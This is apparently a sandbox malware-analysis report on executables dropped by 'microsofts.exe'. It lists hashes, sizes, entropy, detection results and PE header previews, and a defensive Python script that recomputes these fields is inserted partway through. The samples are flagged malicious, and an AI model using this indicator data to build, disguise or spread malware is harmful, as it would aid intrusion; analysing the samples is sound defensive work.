Entropy (8bit):5.446057768420068
Encrypted:false
SSDEEP:12288:/nEbH0j4x7R6SvyCM8Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:/kwOtO78sqjnhMgeiCl7G0nehbGZpbD
MD5:176B5FB421C3A6285EEC3B0FCBF01A5B
SHA1:E4BC85DF58F801AC0BF9CA5DC4BB1EA501F07915
SHA-256:6185FC1306CCC0BB22D5784F58A40AD382591699B04EC6402BF5A4B8D0F003D4
SHA-512:CFCDB98E9FBAAAB70168914E9E9AEE6337A6406C266D40B46CD5DEAB7BD3D0387AB77F0959AA32C168C99C2F167116B472774233F2166E8681F474BA1296DB23
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1375232
Entropy (8bit):5.446797871977871
Encrypted:false
SSDEEP:24576:fnU/h/4KvsqjnhMgeiCl7G0nehbGZpbD:fU/VTDmg27RnWGj
MD5:0C909940E537099E3A7095D795714C45
SHA1:6862B739A1180BE20446E27D5217AA255664AD89
SHA-256:1D25D0D7A5D10A6A279BDAB96C950C0DE7F2D788BB267295C4B80733D44215C7
SHA-512:6F8481EE1C52F8B85FCFA0269A9632ED37E4E03AFBCEE9C4957B58C6A7A2148246CF95B14A6C21DEF7F6291AB3474F762D0C09085C47038EDBE045D382477738
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1513984
Entropy (8bit):5.483734473687962
Encrypted:false
SSDEEP:24576:Px71iBLZ05jNTmJWExIsqjnhMgeiCl7G0nehbGZpbD:PxhiHIjNg0Dmg27RnWGj
MD5:60FE77B5B6D89647870AA63743294C9A
SHA1:58F4AC7914152841E913B5454643882C75672B5C
SHA-256:D239C98755B27FC94716EF05C56E066CE24335223C0A4DFB2E8D8BB6F12216AB
SHA-512:10FFE411F220CFD62A2EE6BDAD29031D6F8F7BDFE39811A27E1CADFC66D228A7D8CE6F48CEFDD31986754428DFB2C418BEC015ADAA4D1815911DB9F301E6C1BF
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1419264
Entropy (8bit):5.466705812692128
Encrypted:false
SSDEEP:24576:elnRklQ6fgJcEwix+sqjnhMgeiCl7G0nehbGZpbD:qoRfgJcEwCSDmg27RnWGj
MD5:E6B2EEBE75D85F618BCB231D70BD1234
SHA1:E75C71E2B0E479BEC5C75E3469EF4FA29F68AB02
SHA-256:8D8050FC089DAADD648B6C8FD76D6F8BD0AE4D0A7A5F3C7EC481D669A99FC416
SHA-512:896901E323DB92A1CA2C9C0153BD6CE16B883455C88D7307CBCB4CA9DBC50A856517E238002FCEBD86619137C49B8D690932692EB7B13C383233F75F4E87B351
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1522176
Entropy (8bit):5.4965063984947395
Encrypted:false
SSDEEP:24576:tW25k8hb0Haw+xOsqjnhMgeiCl7G0nehbGZpbD:tWyk8SHawmiDmg27RnWGj
MD5:6F2B4DE3187122B7FA3B9B1A9805E920
SHA1:56283CD7C7072EA41228DB6FDF8ABE1AD7184F12
SHA-256:C5FBC46962A2A7A3D96F4F24408C9AAB283CA03E241B47C6D6A00520D8AFC568
SHA-512:7AFE32D1A4FE339950DA3855B6EE0DAE1A2599D3DB7C5F5AF29ED667302A986FEA298B12A68A72FDB8D1567E9758D585B1006C27BEEEE176FCAE9AEF3DD37F4E
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1282048
Entropy (8bit):5.1639341081179815
Encrypted:false
SSDEEP:12288:6WP/aK2vB+NXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:6KCKABWsqjnhMgeiCl7G0nehbGZpbD
MD5:2B2DF1BEF96B6AF00DEDFA06FE9B7574
SHA1:B65E0E43E902919CC470862CAFF5B3A8CB79581C
SHA-256:FFD6C3821D4826A9E0D52BE6FBD63BA669D358E58D081AA1BF5300067EE701B8
SHA-512:A73A27538E6927F44B1EECF87B9685285480908F5BB0DBAAD7E9B73719CA4ABA3FE2D903AEC1F2B5C35E66CF06FB3A99F6B67570328F0AF53C5D1DF23C2E5D2D
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1228288
Entropy (8bit):5.162006915287255
Encrypted:false
SSDEEP:12288:6O7cCNWB+09fXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:HjNWBP9sqjnhMgeiCl7G0nehbGZpbD
MD5:A55EB9265677D543C93BD0B3CA951F58
SHA1:866AD5772BAB5A64943CB47F0D2513FE2C71EB23
SHA-256:BD7F1A0FE061E45742A2AEC8342C4F894984BB5CD997675AFBCC5319F1FDC603
SHA-512:7CA913758986A05A3DE06ADC224B859D5F40579B46C0BB36DDB4C0E88EEB15B3C358B8C2527D5E4ED3E1FA560C88B96CF41FE90AA6B69DB0B271395DD9AA7FF8
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1302528
Entropy (8bit):5.238899269533076
Encrypted:false
SSDEEP:24576:2ihRyhdsRrTsqjnhMgeiCl7G0nehbGZpbD:2ihsoRXDmg27RnWGj
MD5:02B43F54AADF2485F7EE672DECAE374A
                                                                                                                                                                                                                                                                                                          SHA1:FB662BBE848B6AF3307617CC26CAA90D2F2376BC
                                                                                                                                                                                                                                                                                                          SHA-256:6CB3BAF4E8253575895F598887142213DEFCC9F679FCA5E912A73D6FE62925AD
                                                                                                                                                                                                                                                                                                          SHA-512:7ED536188E99B2FA4D86C884D3E2A7362C3B8620D97C8DDC2E4D07FF97DBF97F62DB9A7C39911B15337E329AA03DB637A072843786475394C25F465BE9C23D06
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p.......j.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1342464
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.350994005746682
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:71FDmRF+wpx/Qaf0sqjnhMgeiCl7G0nehbGZpbD:3mRF+wn/JfQDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:55465E53911DA165F357631E027254F4
                                                                                                                                                                                                                                                                                                          SHA1:CFB6B2BE8DF68DEDC095B482325DB3E44B507BDC
                                                                                                                                                                                                                                                                                                          SHA-256:D50EABEBF644FB4930AE7BE1E436D51A4095220CEAE1D7580FB68755327B0376
                                                                                                                                                                                                                                                                                                          SHA-512:AC2B3962AC64D53A529C9F0970C0B7A97DB39CECBD4F9CF8A0381C095CF9D12ECA81515361D078EC57686292D84D29C8B0377A8EE08D1D44D9F9C46D44F4EEFA
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@..................................................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1228288
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.161975491582021
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:I2Ae621B+0YJXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:lE21BPasqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:A648A70AC78743EA84DE0B04FDEA8746
                                                                                                                                                                                                                                                                                                          SHA1:364EE3B013843A22FBF939039467223514C2BA98
                                                                                                                                                                                                                                                                                                          SHA-256:818EEA692F1FEE8367E42A3FC38910FC81069322B3B4F7BA3BB205B28EE79A5F
                                                                                                                                                                                                                                                                                                          SHA-512:1796BE6249E61485C3297C0490FBB891B2D036316BB6C6D43CDC4F5254E53BF0C6792B3C1953917AFA25BB35CE9CBDC5FC255E37929DF3D21F60B71667A3361A
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@..................................L.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):105669632
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999989847076896
                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                          SSDEEP:3145728:RLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:xBWx/pt8U7E6aZRfIICU
                                                                                                                                                                                                                                                                                                          MD5:C50489C6F683418C0CD65DBF286CA434
                                                                                                                                                                                                                                                                                                          SHA1:AF8881E72CCAD29903DB8E1D6B5827B5773337B1
                                                                                                                                                                                                                                                                                                          SHA-256:867B8523925DA7D14819470D236490610FCBDD155C62F284624B956077E31529
                                                                                                                                                                                                                                                                                                          SHA-512:C7DC1B1867EC33B466C71E8F214A23D4B035DAC0E0D527356F8DA1927039B659D454D6D9663A170813CD615C092425CB6B0044418ACC66D9C13032DC3AE21203
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.......L... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................
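The per-file fields in these entries (Size, Entropy (8bit), Encrypted, the MD5/SHA1/SHA-256/SHA-512 hashes and the File Type string) can be recomputed from raw bytes when a sample has to be re-verified outside the sandbox. The script below is an added example and not Joe Sandbox's own code: it walks the MZ/PE headers to derive the PE32 vs PE32+ and GUI vs console wording the report uses, computes 8-bit Shannon entropy and the hashes, and builds a constructed minimal PE image so it runs offline. The 7.99 entropy cut-off for the "encrypted" flag is an assumption chosen to match the values shown on this page (true at 7.99999, false at 5.x); the vendor's actual threshold is not stated here. The entry just above (105669632 bytes, entropy 7.99999) is the case the caveat addresses: entropy that close to 8.0 also results from compression or from any flat byte distribution, so "Encrypted:true" is a heuristic, not proof that a cipher was used.

```python
"""Recompute the dropped-file metadata fields shown in a sandbox report
(size, 8-bit entropy, MD5/SHA-1/SHA-256/SHA-512, PE32 vs PE32+ and
GUI vs console) from raw bytes, plus an entropy-based 'encrypted' flag."""
import hashlib
import math
import struct
from collections import Counter

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
SUBSYSTEM_WINDOWS_GUI = 2
SUBSYSTEM_WINDOWS_CUI = 3
# Assumed cut-off: the report shows Encrypted:true at entropy ~7.99999 and
# Encrypted:false at ~5.x; the vendor's exact threshold is not on the page.
ENCRYPTED_ENTROPY_THRESHOLD = 7.99


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 (constant) to 8.0 (flat)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_file_type(data: bytes) -> str:
    """Describe a PE image in the 'file'-style wording the report uses,
    or 'not a PE' if the MZ/PE signatures or header offsets do not check out."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "not a PE"
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # e_lfanew is attacker-controlled: bounds-check before indexing with it.
    # Needed: PE signature (4), COFF header (20), optional header through the
    # 2-byte Subsystem field at optional-header offset 68.
    if e_lfanew + 4 + 20 + 70 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "not a PE"
    coff = e_lfanew + 4
    machine, _nsec, _ts, _psym, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    if opt_size < 70:
        return "not a PE"
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    # Subsystem sits at optional-header offset 68 in both PE32 and PE32+.
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)
    fmt = {PE32_MAGIC: "PE32", PE32PLUS_MAGIC: "PE32+"}.get(magic)
    if fmt is None:
        return f"PE (unknown optional-header magic 0x{magic:x})"
    arch = {IMAGE_FILE_MACHINE_I386: "Intel 80386", IMAGE_FILE_MACHINE_AMD64: "x86-64"}.get(
        machine, f"machine 0x{machine:04x}")
    sub = {SUBSYSTEM_WINDOWS_GUI: "GUI", SUBSYSTEM_WINDOWS_CUI: "console"}.get(
        subsystem, f"subsystem {subsystem}")
    return f"{fmt} executable ({sub}) {arch}, for MS Windows"


def describe(data: bytes) -> dict:
    """Return the per-file fields a dropped-file table lists."""
    entropy = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": entropy,
        "encrypted": entropy >= ENCRYPTED_ENTROPY_THRESHOLD,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
        "file_type": pe_file_type(data),
    }


def build_sample_pe(pe32plus: bool, subsystem: int, tail: bytes = b"") -> bytes:
    """Constructed minimal PE image (headers only, no sections): not loadable,
    just enough for the header walk above. 'tail' stands in for file content."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    machine = IMAGE_FILE_MACHINE_AMD64 if pe32plus else IMAGE_FILE_MACHINE_I386
    opt_size = 240 if pe32plus else 224
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x0002)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + tail


if __name__ == "__main__":
    # A flat byte distribution (every value equally often) scores 8.0 bits/byte
    # and trips the threshold although nothing was encrypted: entropy cannot
    # tell a cipher from a compressor or from a uniform lookup table.
    flat = bytes(range(256)) * 4096
    for label, blob in [("x86 GUI, headers only", build_sample_pe(False, SUBSYSTEM_WINDOWS_GUI)),
                        ("x64 console, headers only", build_sample_pe(True, SUBSYSTEM_WINDOWS_CUI)),
                        ("x64 GUI + flat payload", build_sample_pe(True, SUBSYSTEM_WINDOWS_GUI, flat))]:
        d = describe(blob)
        print(f"{label}: {d['file_type']}; size={d['size']} entropy={d['entropy']:.4f} "
              f"encrypted={d['encrypted']} sha256={d['sha256'][:16]}...")
```

To run it against a real dropped file, pass `open(path, "rb").read()` to `describe()` and compare the hashes with the table; a mismatch means the artifact on disk is not the one the sandbox analysed. The bounds check on `e_lfanew` matters when the input is malware: a crafted header offset must not be allowed to index past the buffer.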
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1158144
Entropy (8bit):5.068066437874322
Encrypted:false
SSDEEP:12288:JWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JWsqjnhMgeiCl7G0nehbGZpbD
MD5:2C1208ABF13FEFF7B0A655A2A4D74197
SHA1:24C574199575B823C942A95CC20F137DA157D328
SHA-256:9A9180A0EAA5B7B5921582825614219CA5CFACD528F180A84E7C2C5558733108
SHA-512:EA25D742DEFC32902ED1B649AF7A83F0B366866A6A074CC09ED496C5FCF1892539C9BD395A212AE49D332EE621605FD25423186BD1E0E471802706FEF9BDF48D
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@..................................0......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.032396450093068
Encrypted:false
SSDEEP:12288:oKtXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:1tsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:457AA0B21CA15AB0AF7EA92A5CDC5694
                                                                                                                                                                                                                                                                                                          SHA1:4F093F6DB37714731CA8B360B4CF7F31294D2796
                                                                                                                                                                                                                                                                                                          SHA-256:20EDDE53A09DEEBE98BFA00E0515228C5AD5205ACB01B99DCE2BEB4849086BBF
                                                                                                                                                                                                                                                                                                          SHA-512:9D05B86807414F691ACEB9AC2F2A99FC1AEBACE87D165272F10A57C71BE95193C9755C0793284D955FA4CB6CEB30BB7E7B5079D603CCFD2176C525BB8583BE13
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1375232
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.446062265811503
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:SnEbH0j4x7R6SvyCM8Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:SkwOtO78sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:0309D4D169AB5810F8A6D7BBBEBA7CAF
                                                                                                                                                                                                                                                                                                          SHA1:A4B48790031A39D2DC2AEA3EC926F99060FB3302
                                                                                                                                                                                                                                                                                                          SHA-256:849AF6EB7816A5C3581BBB4E0DBA0272556A1B9DC1F871918611CA89EFD1CF47
                                                                                                                                                                                                                                                                                                          SHA-512:F0B5E3A40F555500668B4615C7A4DDC2C0A93B87A35FF1BFAEC9FF09BCF64CABBB837C6CD2B31695CB770709E1FCDD6139EB0A635599BD50D023FCD2202D2284
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1212416
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1197219794391815
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:av1vvhXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:m1BsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:44EA03315FED286C52AD490E9857FE6F
                                                                                                                                                                                                                                                                                                          SHA1:D2365AF2A4F2E9EAC997467C6D51FF7C94A5243F
                                                                                                                                                                                                                                                                                                          SHA-256:874A51567E4C4779E3B1CCB73406D157C9CEEAE24087B83228FE244591BEF1CD
                                                                                                                                                                                                                                                                                                          SHA-512:3FE0DFBAC481665C2E1BE5D2A8A03107E86047BB382287204E6EAAF3ACDB9F742967A46AE8F450A4EF59B2E3A363B082168D02B971FB604E6ED2A9BF535FBFFC
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1375232
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.446813086644456
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:FnU/h/4KvsqjnhMgeiCl7G0nehbGZpbD:FU/VTDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:6A3565DE9FF0A7F882F4965F07C6DFD4
                                                                                                                                                                                                                                                                                                          SHA1:8714310743AB04CDC1F728B249FED601A1D2263A
                                                                                                                                                                                                                                                                                                          SHA-256:ADF8455891AA5F068152B97F58618E096DA7E827745533BBB5459B3A28913440
                                                                                                                                                                                                                                                                                                          SHA-512:AB37C2E35305E239C9BE108252B2D941207D7DE0E1653FFDFA42079036DB0BEC2169126DBB74DFE1335CAE1F1D5182230975BF3EF26132C99030B4C7F5247F20
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......Z........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1513984
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.483733037503609
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:Xx71iBLZ05jNTmJWExIsqjnhMgeiCl7G0nehbGZpbD:XxhiHIjNg0Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:AA268AD35864F68A79020AAF20424DE2
                                                                                                                                                                                                                                                                                                          SHA1:201AE5A1DCEB793F76DE4E70CD11C506EA0D2B49
                                                                                                                                                                                                                                                                                                          SHA-256:CD7CE2CFF21D90A7B6708C355B989BF1A9A9B71768282967527BC0992E29EE22
                                                                                                                                                                                                                                                                                                          SHA-512:5B985DD612C17272BE03E1DB860FEF29B5FB58BA90F2474BF9896470AAE2C03357F6812B14F072F4A834E9F48559F75841E9C820D6F8C9283FB9FB53135E0583
